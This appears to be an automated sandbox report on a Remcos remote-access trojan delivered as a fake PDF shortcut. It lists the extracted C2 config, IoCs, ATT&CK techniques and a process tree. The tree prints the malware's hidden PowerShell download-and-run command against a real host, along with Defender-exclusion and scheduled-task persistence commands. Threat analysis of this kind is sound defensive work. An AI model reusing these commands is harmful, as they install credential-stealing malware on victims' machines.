Analysis
-
max time kernel
299s -
max time network
273s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-09-2024 09:47
Static task
static1
Behavioral task
behavioral1
Sample
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
Resource
win10v2004-20240802-en
General
-
Target
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
-
Size
2KB
-
MD5
b3173ef1cf4572a76e159dc513e3fc31
-
SHA1
dbb727b41a95e6976afb742741af16952467af00
-
SHA256
82277e734f339a7fce08aac2b342fae94e20f3349a568b839d39ccd3a81cc215
-
SHA512
3e479a063085634ccce4bd04645c16c61ef357f44a97a71be95abbed4e30eca27fe661e302e04f9d699dcf7454f6ee0b15304f02e49f7ad8d815db65b64f8909
Malware Config
Extracted
remcos
Sept 03 2024
salonirang.duckdns.org:54604
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
bookmark
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Rmc-SPKD1X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3640-254-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2192-250-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3132-249-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2192-250-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3132-249-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 836 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4132 powershell.exe 1088 powershell.exe 836 powershell.exe 836 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation target.pif -
Executes dropped EXE 6 IoCs
pid Process 4284 target.pif 3780 target.pif 4708 target.pif 3132 target.pif 2192 target.pif 3640 target.pif -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts target.pif -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4284 set thread context of 4708 4284 target.pif 118 PID 4708 set thread context of 3132 4708 target.pif 119 PID 4708 set thread context of 2192 4708 target.pif 120 PID 4708 set thread context of 3640 4708 target.pif 121 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language target.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language target.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language target.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language target.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language target.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 848 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 836 powershell.exe 836 powershell.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 4284 target.pif 4284 target.pif 4132 powershell.exe 4132 powershell.exe 1088 powershell.exe 1088 powershell.exe 4284 target.pif 4284 target.pif 4284 target.pif 4132 powershell.exe 1088 powershell.exe 4708 target.pif 4708 target.pif 4708 target.pif 4708 target.pif 4708 target.pif 4708 target.pif 3132 target.pif 3132 target.pif 3640 target.pif 3640 target.pif 3132 target.pif 3132 target.pif -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4708 target.pif 4708 target.pif 4708 target.pif -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 4284 target.pif Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeDebugPrivilege 3640 target.pif -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1336 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 1336 AcroRd32.exe 4708 target.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2664 wrote to memory of 836 2664 cmd.exe 90 PID 2664 wrote to memory of 836 2664 cmd.exe 90 PID 836 wrote to memory of 1336 836 powershell.exe 93 PID 836 wrote to memory of 1336 836 powershell.exe 93 PID 836 wrote to memory of 1336 836 powershell.exe 93 PID 1336 wrote to memory of 4820 1336 AcroRd32.exe 97 PID 1336 wrote to memory of 4820 1336 AcroRd32.exe 97 PID 1336 wrote to memory of 4820 1336 AcroRd32.exe 97 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4764 4820 RdrCEF.exe 98 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99 PID 4820 wrote to memory of 4780 4820 RdrCEF.exe 99
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri "http://tradimex.cc/eDVkOEaO/KD20240829230014246600006B6BA327.pdf" -OutFile "$env:TEMP\spoof.pdf"; Start-Process "$env:TEMP\spoof.pdf"; Start-Sleep -Seconds 20; Invoke-WebRequest -Uri "http://tradimex.cc/DgjopIWH/TJgGO5EprAaBIME.pif" -OutFile "$env:TEMP\target.pif"; Start-Process "$env:TEMP\target.pif""2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spoof.pdf"3⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C5370A42480DFF2BDC77E9F9205E557E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:4764
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=37C9961F00865BD3E2F33B6FE6CA25C1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=37C9961F00865BD3E2F33B6FE6CA25C1 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:15⤵
- System Location Discovery: System Language Discovery
PID:4780
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4E16091F3C4115A7E44EF1FFBE2FA871 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:848
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A521C0F2147FA1ED981504124B668D3F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A521C0F2147FA1ED981504124B668D3F --renderer-client-id=5 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job /prefetch:15⤵
- System Location Discovery: System Language Discovery
PID:2776
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=458D5909F90C615850F6D95EE6C85853 --mojo-platform-channel-handle=1888 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D361468A2930C98CB541D65893495FD4 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:4216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\target.pif"C:\Users\Admin\AppData\Local\Temp\target.pif"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\target.pif"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gVmBHRfidrI.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gVmBHRfidrI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFA49.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\target.pif"C:\Users\Admin\AppData\Local\Temp\target.pif"4⤵
- Executes dropped EXE
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\target.pif"C:\Users\Admin\AppData\Local\Temp\target.pif"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\target.pifC:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\rouuvriknikzxy"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3132
-
-
C:\Users\Admin\AppData\Local\Temp\target.pifC:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\bjhmvjtljrceheuof"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\target.pifC:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\llmfwcdfxzuqklqsxwsc"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4460,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:81⤵PID:4612
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD59cc0d83bd5fb964b14a5ea0c8f7b3c77
SHA1df64df17119ebc800daf5f1d784fe531ebe4fb36
SHA256e503a5a5b0471c568d398b689b834d453a777a1e85d3b645e498141e705895c7
SHA5129a028fef5e5df99d8fcd6cb04694ccf9a49f7921505d3c0b10e66d5b7f0fcfab1edc4aa9441ad54f5dfc2e2b21ff69000aa595ed9a87f3529dd87fd9cce7082e
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
1KB
MD5027f752ee0cbbc3ac151148c1292faee
SHA179a3e6fd6e0a6db95f8d45eb761a629c260f937c
SHA2560359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da
SHA5120db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97
-
Filesize
60B
